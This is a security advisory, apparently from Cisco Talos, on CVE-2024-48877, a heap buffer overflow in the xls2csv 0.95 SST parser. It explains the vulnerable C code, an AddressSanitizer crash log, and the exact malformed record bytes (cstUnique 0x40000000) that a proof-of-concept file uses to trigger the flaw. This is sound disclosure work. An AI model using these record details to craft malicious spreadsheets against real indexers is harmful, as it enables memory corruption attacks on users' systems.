CVE-2024-48877
A memory corruption vulnerability exists in the Shared String Table Record Parser implementation in xls2csv utility version 0.95. A specially crafted malformed file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
xls2csv 0.95
xls2csv - http://wagner.pp.ru/~vitus/software/catdoc/
8.4 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-680 - Integer Overflow to Buffer Overflow
The xls2csv command-line utility is used by several filesystem indexers in order to extract the textual content from a Microsoft Excel document. The purpose of this is to enable searching through the contents of office documents that are stored on a filesystem.
The xls2csv program is an open-source application that comes with the catdoc suite of command-line utilities. These utilities are designed to extract plaintext from various Microsoft Office documents, and support file formats from Microsoft Word, Excel, and PowerPoint. They are used internally by several filesystem indexers, such as KDE’s Baloo, to provide full-text search over the contents of documents.
The xls2csv application is responsible for extracting plaintext from Microsoft Excel documents. At [1], the binary opens a handle to the document to be parsed and then processes its header using the call to ole_init at [2]. After processing the header, it enters a loop that iterates through each directory entry in the file. If the directory entry is named “Book” or “Workbook”, the do_table function at [3] is used to parse its contents.
src/xls2csv.c:40-180
char *input_buffer, *output_buffer;
int main(int argc, char *argv[])
{
    ...
    for (i=optind;i<argc;i++) {
        filename = argv[i];
        input=fopen(filename,"rb"); // [1] open up handle to document
        if (!input) {
            perror(filename);
            exit(1);
        }
        if ((new_file=ole_init(input, NULL, 0)) != NULL) { // [2] read the OLE compound document header
            set_ole_func();
            while((ole_file=ole_readdir(new_file)) != NULL) { // [2] traverse each directory entry
                int res=ole_open(ole_file);
                ...
                if (res >= 0) {
                    if (strcasecmp(((oleEntry*)ole_file)->name , "Workbook") == 0
                        || strcasecmp(((oleEntry*)ole_file)->name,"Book") == 0) {
                        do_table(ole_file,filename); // [3] process the excel "Workbook" stream
                    }
                }
                ole_close(ole_file);
            }
            set_std_func();
            ...
    return 0;
}
The following function is the implementation of do_table. This function reads each individual record within the stream and processes it. At [4] and [5], the function reads the 16-bit record type and the 16-bit record length from the stream. Once this information has been read, both fields are passed to the process_item function at [6].
src/xlsparse.c:35-124
void do_table(FILE *input,char *filename) {
    long rectype;
    long reclen,build_year=0,build_rel=0,offset=0;
    int eof_flag=0;
    int itemsread=1;
    date_shift=25569.0; /* Windows 1900 date system */
    CleanUpFormatIdxUsed();
    ...
    while(itemsread){
        unsigned char buffer[2];
        ...
        rectype=getshort(buffer,0); // [4] read 16-bit record type
        itemsread = catdoc_read(buffer, 2, 1, input);
        if(itemsread == 0)
            break;
        reclen=getshort(buffer,0); // [5] read 16-bit record length
        if (reclen && reclen <MAX_MS_RECSIZE &&reclen >0){
            itemsread = catdoc_read(rec, 1, reclen, input);
            rec[reclen] = '\0';
        }
        ...
        process_item(rectype,reclen,rec); // [6] process the record
        ...
    }
    return;
}
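The record framing that do_table walks can be sketched in a few lines of Python. This is a minimal illustration and not catdoc's code: the name `iter_records` is hypothetical, and the sketch assumes only what is described above, namely that each record is a little-endian 16-bit type followed by a little-endian 16-bit length and that many payload bytes. It does not model the MAX_MS_RECSIZE check.

```python
import struct

def iter_records(stream: bytes):
    """Yield (rectype, payload) pairs from a BIFF-style record stream.

    Hypothetical helper for illustration only; it is not part of catdoc.
    """
    offset = 0
    while offset + 4 <= len(stream):
        # 16-bit record type followed by 16-bit record length, little-endian
        rectype, reclen = struct.unpack_from("<HH", stream, offset)
        offset += 4
        payload = stream[offset:offset + reclen]
        if len(payload) < reclen:
            break  # truncated record: stop rather than guess
        offset += reclen
        yield rectype, payload

# Two records: an SST (0x00fc) with 8 payload bytes, then an EOF (0x000a) with none
sample = struct.pack("<HH", 0x00FC, 8) + bytes(8) + struct.pack("<HH", 0x000A, 0)
records = list(iter_records(sample))
```

Each yielded pair corresponds to one call to process_item in the C code.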
The process_item function uses the record type and length to parse each individual record within the stream. The two record types associated with this vulnerability are the “SST” and “CONTINUE” records. At [7], the record length is used to allocate a buffer for the “SST” record, and the record’s contents are copied into it. At [8], the record length is used to resize the current SST buffer, and the contents of the “CONTINUE” record are appended to it. Once the process_item function encounters a record type that is not a “CONTINUE” record, the parse_sst function at [9] is used to process the data collected from the stream.
src/xlsparse.c:137-416
void process_item (int rectype, int reclen, unsigned char *rec) {
    if (rectype != CONTINUE && prev_rectype == SST) {
        ...
        parse_sst(sstBuffer,sstBytes); // [9] Parse the collected SST contents
    }
    switch (rectype) {
    ...
    case SST: {
        /* Just copy SST into buffer, and wait until we get
         * all CONTINUE records
         */
        ...
        /* If exists first SST entry, then just drop it and start new*/
        if (sstBuffer != NULL)
            free(sstBuffer);
        if (sst != NULL)
            free(sst);
        ...
        sstBuffer=(unsigned char*)malloc(reclen); // [7] allocate memory for SST record
        sstBytes = reclen;
        ...
        memcpy(sstBuffer,rec,reclen); // [7] write contents of SST to allocation
        break;
    }
    case CONTINUE: {
        if (prev_rectype != SST) {
            return; /* to avoid changing of prev_rectype;*/
        }
        sstBuffer=realloc(sstBuffer,sstBytes+reclen); // [8] resize SST buffer for CONTINUE record
        ...
        memcpy(sstBuffer+sstBytes,rec,reclen); // [8] write contents of CONTINUE record
        sstBytes+=reclen;
        return;
    }
    ...
}
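The buffering behavior described above can be modeled as follows. This is a rough sketch under stated assumptions, not the catdoc implementation: `collect_sst` is a hypothetical name, records are given as (rectype, payload) pairs, and the record type values 0x00fc and 0x003c are taken from the listings later in this advisory.

```python
SST = 0x00FC
CONTINUE = 0x003C

def collect_sst(records):
    """Concatenate an SST payload with the CONTINUE payloads that follow it.

    Hypothetical helper; it models the buffering only, not catdoc's parser.
    """
    sst_buffer = None
    prev_rectype = None
    for rectype, payload in records:
        if rectype != CONTINUE and prev_rectype == SST:
            return bytes(sst_buffer)          # point at which parse_sst would run
        if rectype == SST:
            sst_buffer = bytearray(payload)   # start a fresh buffer
        elif rectype == CONTINUE:
            if prev_rectype == SST:
                sst_buffer += payload         # grow the buffer and append
            continue                          # prev_rectype is left unchanged
        prev_rectype = rectype
    # Stream ended without a terminating record: return whatever was collected
    return None if sst_buffer is None else bytes(sst_buffer)

example = [
    (0x0809, b""),
    (SST, b"\x01\x00\x00\x00\x00\x00\x00\x40"),
    (CONTINUE, b"AB"),
    (CONTINUE, b"CD"),
    (0x000A, b""),
]
merged = collect_sst(example)
```

Because a CONTINUE record never updates the previous record type, any number of CONTINUE records can extend the same SST buffer before it is parsed.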
When parsing the combined contents of the “SST” and “CONTINUE” records, the following parse_sst function is used. At [10], the function reads a 32-bit integer from offset 4 of the buffer that was populated. At [11], this value is multiplied by the size of a pointer, and the product is used as the size of an allocation for an array of pointers. On 32-bit platforms, this multiplication can overflow, leaving the array undersized. At [12], a loop is entered to populate the newly allocated array, and the assignment at [13] then writes outside the bounds of the undersized array.
src/xlsparse.c:758-779
void parse_sst(unsigned char *sstbuf,int bufsize) {
    int i; /* index into sst */
    unsigned char *curString; /* pointer into unparsed buffer*/
    unsigned char *barrier=(unsigned char *)sstbuf+bufsize; /*pointer to end of buffer*/
    unsigned char **parsedString;/*pointer into parsed array*/
    sstsize = getlong(sstbuf+4,0); // [10] read 32-bit integer
    sst=(unsigned char **)malloc(sstsize*sizeof(unsigned char *)); // [11] allocate memory for string references
    ...
    memset(sst,0,sstsize*sizeof(char *));
    for (i=0,parsedString=sst,curString=sstbuf+8; // [12] loop to read each string from SST
         i<sstsize && curString<barrier; i++,parsedString++) {
        ...
        *parsedString = copy_unicode_string(&curString); // [13] assign reference to string into allocation
    }
    ...
}
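The arithmetic behind the undersized allocation can be reproduced with a short model. The sketch below assumes a 32-bit build in which pointers are 4 bytes and the multiplication is carried out in a 32-bit size_t; the function names are hypothetical, and `count_is_safe` is only one possible guard, not the vendor's fix.

```python
POINTER_SIZE = 4            # sizeof(unsigned char *) on a 32-bit build (assumed)
SIZE_MAX_32 = 0xFFFFFFFF    # largest value a 32-bit size_t can hold

def wrapped_alloc_size(count: int, elem_size: int = POINTER_SIZE) -> int:
    """Byte count the allocator would receive when size_t is 32 bits wide."""
    return (count * elem_size) & SIZE_MAX_32

def count_is_safe(count: int, elem_size: int = POINTER_SIZE) -> bool:
    """Hypothetical guard: reject negative counts and products that would wrap."""
    return 0 <= count <= SIZE_MAX_32 // elem_size

for count in (1, 0x3FFFFFFF, 0x40000000, 0x40000001):
    print(hex(count), "->", wrapped_alloc_size(count), "bytes requested,",
          "safe" if count_is_safe(count) else "wraps")
```

A count of 0x40000000 produces a request of 0 bytes and 0x40000001 produces a request of 4 bytes, while the loop at [12] is still bounded by the original, much larger count.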
=================================================================
==446418==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf5000ff0 at pc 0x0804ce54 bp 0xff8b4c38 sp 0xff8b4c2c
WRITE of size 4 at 0xf5000ff0 thread T0
#0 0x804ce53 in parse_sst /.../catdoc/src/xlsparse.c:775
#1 0x804d55f in process_item /.../catdoc/src/xlsparse.c:142
#2 0x804f1a1 in do_table /.../catdoc/src/xlsparse.c:116
#3 0x804a0bb in main /.../catdoc/src/xls2csv.c:167
#4 0xf75e6d42 in __libc_start_call_main (/lib/libc.so.6+0x2d42) (BuildId: 5846c8c4629a038f4d1a47fd0ffd369dedf95400)
#5 0xf75e6e07 in __libc_start_main@@GLIBC_2.34 (/lib/libc.so.6+0x2e07) (BuildId: 5846c8c4629a038f4d1a47fd0ffd369dedf95400)
#6 0x804a887 in _start (/.../catdoc/src/xls2csv+0x804a887) (BuildId: b35845f47ccf2f2aec66798eb0192a603c879079)
0xf5000ff1 is located 0 bytes after 1-byte region [0xf5000ff0,0xf5000ff1)
allocated by thread T0 here:
#0 0xf7989f0b in calloc (/lib/libasan.so.8+0xcef0b) (BuildId: 4750f09fdf739c5f6973660b631b7f5960de4d51)
#1 0x804cd46 in parse_sst /.../catdoc/src/xlsparse.c:765
#2 0x804d55f in process_item /.../catdoc/src/xlsparse.c:142
#3 0x804f1a1 in do_table /.../catdoc/src/xlsparse.c:116
#4 0x804a0bb in main /.../catdoc/src/xls2csv.c:167
#5 0xf75e6d42 in __libc_start_call_main (/lib/libc.so.6+0x2d42) (BuildId: 5846c8c4629a038f4d1a47fd0ffd369dedf95400)
SUMMARY: AddressSanitizer: heap-buffer-overflow /.../catdoc/src/xlsparse.c:775 in parse_sst
Shadow bytes around the buggy address:
0xf5000d00: fa fa 02 fa fa fa 02 fa fa fa 02 fa fa fa 02 fa
0xf5000d80: fa fa 02 fa fa fa 02 fa fa fa 02 fa fa fa 02 fa
0xf5000e00: fa fa 03 fa fa fa 02 fa fa fa 03 fa fa fa 02 fa
0xf5000e80: fa fa 02 fa fa fa 02 fa fa fa 02 fa fa fa 03 fa
0xf5000f00: fa fa 03 fa fa fa 02 fa fa fa 03 fa fa fa 02 fa
=>0xf5000f80: fa fa fa fa fa fa fa fa fa fa 01 fa fa fa[01]fa
0xf5001000: fa fa fd fa fa fa 01 fa fa fa 01 fa fa fa 04 fa
0xf5001080: fa fa 03 fa fa fa 02 fa fa fa 03 fa fa fa 04 fa
0xf5001100: fa fa 02 fa fa fa 02 fa fa fa 03 fa fa fa 03 fa
0xf5001180: fa fa 02 fa fa fa 02 fa fa fa 02 fa fa fa 05 fa
0xf5001200: fa fa 03 fa fa fa 02 fa fa fa 03 fa fa fa 03 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==446418==ABORTING
The included proof-of-concept requires Python 3 and generates a Microsoft Excel document. To use it, pass the desired output filename as a parameter. The generated file can then be passed as a parameter to the xls2csv binary.
$ python3 poc.py3.zip /path/to/filename.xls
...
$ src/xls2csv /path/to/filename.xls
The “Workbook” stream in the generated document has 1 worksheet that is composed of 6 records.
>>> store
<class excel.File> 'unnamed_7fe164ba77d0' {unnamed=True,overcommit=True,size=8288} excel.BiffSubStream[1]
[0] excel.BiffSubStream[0] : 0(version=8) : 6 records : excel.BOF5[0:+14] "\x09\x08\x08\x00\x00\x00\x00\x00\x00" ... excel.EOF[2054:+4] "\x0a\x00\x00\x00"
>>> store[0]
<class excel.BiffSubStream> '0' {overcommit=True,document-type='0x0000 (0)',document-version='0.0',document-year=0,document-build=0} excel.RecordGeneral[6]
[0] excel.BiffSubStream[0] : excel.BOF5[0809] : vers=0x0000 (0) rupBuild=0x0000 (0) rupYear=0x0000 (0) dt=0x0000 (0) flags=(0xffffffff00080204,64) :> reserved2=1048575 verLastXLSaved=15 verLowestBiff=255 reserved1 fOOM fBeta
[c] excel.BiffSubStream[1] : 2 * excel.BIFF8.unknown<0204>[0204] : \xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x01\x00\x00\x00\x00\x00
[24] excel.BiffSubStream[3] : excel.SST[00fc] : "\x01\x00\x00\x00\x00\x00\x00\x40"
[30] *excel.BiffSubStream[4] : excel.Continue[003c] : ...
[2054] excel.BiffSubStream[5] : excel.EOF[000a] : ...
The first record in this worksheet must be a BOF record of type 0x0809.
>>> store[0][0]
<class excel.RecordGeneral> '0'
[0] <instance excel.RecordGeneral.Header 'header'> type=0x0809 length=0x8(8)
[4] <instance excel.BOF5 'data'> vers=0x0000 (0) rupBuild=0x0000 (0) rupYear=0x0000 (0) dt=0x0000 (0) flags=(0xffffffff00080204,64) :> reserved2=1048575 verLastXLSaved=15 verLowestBiff=255 reserved1 fOOM fBeta
[14] <instance dynamic.block(0) 'extra'> (0) ""
The record at index 3 is the SST record of type 0x00fc, which is directly responsible for this vulnerability.
>>> store[0][3]
<class excel.RecordGeneral> '3'
[24] <instance excel.RecordGeneral.Header 'header'> type=0x00fc length=0x8(8)
[28] <instance excel.SST 'data'> "\x01\x00\x00\x00\x00\x00\x00\x40"
[30] <instance dynamic.block(0) 'extra'> (0) ""
In this record, the 32-bit “cstUnique” field is used to size the array of pointers. If the product of this integer and the size of a pointer does not fit in 32 bits, the vulnerability is triggered. For example, a value of 0x40000000 multiplied by a 4-byte pointer size gives 0x100000000, which truncates to 0.
>>> store[0][3]['data']
<class excel.SST> 'data'
[28] <instance office.sint4 'cstTotal'> +0x00000001 (1)
[2c] <instance office.sint4 'cstUnique'> +0x40000000 (1073741824)
[30] <instance dynamic.blockarray(excel.XLUnicodeRichExtendedString, 0) 'rgb'> excel.XLUnicodeRichExtendedString[0] ""
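The field values in the listing above can be checked by decoding the 8-byte SST payload directly. This is an illustrative sketch rather than part of the proof-of-concept: it assumes the two fields are little-endian signed 32-bit integers, as the listing suggests, and a 4-byte pointer size.

```python
import struct

# Payload of the SST record as shown in the listing above
sst_payload = b"\x01\x00\x00\x00\x00\x00\x00\x40"

# Two little-endian signed 32-bit fields: cstTotal, then cstUnique
cst_total, cst_unique = struct.unpack("<ii", sst_payload)

# Size of the pointer array under 32-bit arithmetic (4-byte pointers assumed)
requested = (cst_unique * 4) & 0xFFFFFFFF

# The same record with its 4-byte header: type 0x00fc, length 8
record = struct.pack("<HHii", 0x00FC, 8, cst_total, cst_unique)

print(cst_total, hex(cst_unique), requested, record.hex())
```

The “cstUnique” field sits at offset 4 of the payload, which is the same offset that parse_sst reads at [10].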
2025-01-07 - Initial Vendor Contact
2025-01-14 - Initial Vendor Contact
2025-01-16 - Vendor Disclosure
2025-06-02 - Public Release
Discovered by a member of Cisco Talos.